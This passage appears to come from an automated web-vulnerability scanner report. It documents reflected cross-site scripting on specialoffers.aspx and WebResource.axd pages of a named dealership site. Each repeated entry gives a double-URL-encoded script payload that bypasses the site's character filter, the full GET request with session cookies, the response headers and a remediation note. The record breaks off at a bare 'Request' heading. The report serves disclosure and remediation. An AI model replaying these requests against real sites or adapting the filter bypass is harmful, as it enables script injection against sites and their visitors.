This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/1/128iConvertible/specialoffers.aspxda593%253cscript%253ealert%25281%2529%253c%252fscript%253e1fba3c56ae9 HTTP/1.1 Host: www.socalbmw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:52:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e462a%253cscript%253ealert%25281%2529%253c%252fscript%253ebf930a6cdac was submitted in the REST URL parameter 5. This input was echoed as e462a<script>alert(1)</script>bf930a6cdac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/1/128icoupe/specialoffers.aspxe462a%253cscript%253ealert%25281%2529%253c%252fscript%253ebf930a6cdac HTTP/1.1 Host: www.socalbmw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:51:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150627
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ed193%253cscript%253ealert%25281%2529%253c%252fscript%253e0ead9635da8 was submitted in the REST URL parameter 5. This input was echoed as ed193<script>alert(1)</script>0ead9635da8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/1/135iConvertible/specialoffers.aspxed193%253cscript%253ealert%25281%2529%253c%252fscript%253e0ead9635da8 HTTP/1.1 Host: www.socalbmw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:52:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 22d00%253cscript%253ealert%25281%2529%253c%252fscript%253e0a8b2049276 was submitted in the REST URL parameter 5. This input was echoed as 22d00<script>alert(1)</script>0a8b2049276 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/1/135iCoupe/specialoffers.aspx22d00%253cscript%253ealert%25281%2529%253c%252fscript%253e0a8b2049276 HTTP/1.1 Host: www.socalbmw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:52:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150627
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5a2e8%253cscript%253ealert%25281%2529%253c%252fscript%253eb356b911f22 was submitted in the REST URL parameter 5. This input was echoed as 5a2e8<script>alert(1)</script>b356b911f22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/328iconvertible/specialoffers.aspx5a2e8%253cscript%253ealert%25281%2529%253c%252fscript%253eb356b911f22 HTTP/1.1 Host: www.socalbmw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:53:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 46ce4%253cscript%253ealert%25281%2529%253c%252fscript%253efcf6a985cb4 was submitted in the REST URL parameter 5. This input was echoed as 46ce4<script>alert(1)</script>fcf6a985cb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/328icoupe/specialoffers.aspx46ce4%253cscript%253ealert%25281%2529%253c%252fscript%253efcf6a985cb4 HTTP/1.1 Host: www.socalbmw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:53:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150627
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5ed5b%253cscript%253ealert%25281%2529%253c%252fscript%253e1814399e1e2 was submitted in the REST URL parameter 5. This input was echoed as 5ed5b<script>alert(1)</script>1814399e1e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/328isedan/specialoffers.aspx5ed5b%253cscript%253ealert%25281%2529%253c%252fscript%253e1814399e1e2 HTTP/1.1 Host: www.socalbmw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:52:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150627
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 87601%253cscript%253ealert%25281%2529%253c%252fscript%253e7e6c06c1b24 was submitted in the REST URL parameter 5. This input was echoed as 87601<script>alert(1)</script>7e6c06c1b24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/328ixdrivecoupe/specialoffers.aspx87601%253cscript%253ealert%25281%2529%253c%252fscript%253e7e6c06c1b24 HTTP/1.1 Host: www.socalbmw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:53:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 80d76%253cscript%253ealert%25281%2529%253c%252fscript%253ec777183dba0 was submitted in the REST URL parameter 5. This input was echoed as 80d76<script>alert(1)</script>c777183dba0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/328ixdrivesedan/specialoffers.aspx80d76%253cscript%253ealert%25281%2529%253c%252fscript%253ec777183dba0 HTTP/1.1 Host: www.socalbmw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:51:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b06fb%253cscript%253ealert%25281%2529%253c%252fscript%253e5daad8dc562 was submitted in the REST URL parameter 5. This input was echoed as b06fb<script>alert(1)</script>5daad8dc562 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/335dsedan/specialoffers.aspxb06fb%253cscript%253ealert%25281%2529%253c%252fscript%253e5daad8dc562 HTTP/1.1 Host: www.socalbmw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:53:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150627
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c1caa%253cscript%253ealert%25281%2529%253c%252fscript%253e5a74548ffe was submitted in the REST URL parameter 5. This input was echoed as c1caa<script>alert(1)</script>5a74548ffe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/335icoupe/specialoffers.aspxc1caa%253cscript%253ealert%25281%2529%253c%252fscript%253e5a74548ffe HTTP/1.1 Host: www.socalbmw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:53:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150621
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 78427%253cscript%253ealert%25281%2529%253c%252fscript%253e05718ba38a2 was submitted in the REST URL parameter 5. This input was echoed as 78427<script>alert(1)</script>05718ba38a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/335iscoupe/specialoffers.aspx78427%253cscript%253ealert%25281%2529%253c%252fscript%253e05718ba38a2 HTTP/1.1 Host: www.socalbmw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:53:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150629
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 99909%253cscript%253ealert%25281%2529%253c%252fscript%253eb322278433c was submitted in the REST URL parameter 5. This input was echoed as 99909<script>alert(1)</script>b322278433c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/335isedan/specialoffers.aspx99909%253cscript%253ealert%25281%2529%253c%252fscript%253eb322278433c HTTP/1.1 Host: www.socalbmw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:52:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150627
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fe9b5%253cscript%253ealert%25281%2529%253c%252fscript%253e05acb610f68 was submitted in the REST URL parameter 5. This input was echoed as fe9b5<script>alert(1)</script>05acb610f68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/335ixdrivecoupe/specialoffers.aspxfe9b5%253cscript%253ealert%25281%2529%253c%252fscript%253e05acb610f68 HTTP/1.1 Host: www.socalbmw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:53:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 512d2%253cscript%253ealert%25281%2529%253c%252fscript%253e59309063493 was submitted in the REST URL parameter 5. This input was echoed as 512d2<script>alert(1)</script>59309063493 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Vehicles/2011/3/335ixdrivesedan/specialoffers.aspx512d2%253cscript%253ealert%25281%2529%253c%252fscript%253e59309063493 HTTP/1.1 Host: www.socalbmw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:53:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d43af%253cscript%253ealert%25281%2529%253c%252fscript%253e19fd595356 was submitted in the REST URL parameter 1. This input was echoed as d43af<script>alert(1)</script>19fd595356 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /WebResource.axdd43af%253cscript%253ealert%25281%2529%253c%252fscript%253e19fd595356 HTTP/1.1 Host: www.socalbmw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:51:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150519
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b1c1f%253cscript%253ealert%25281%2529%253c%252fscript%253e0a4eaefdc5 was submitted in the REST URL parameter 1. This input was echoed as b1c1f<script>alert(1)</script>0a4eaefdc5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
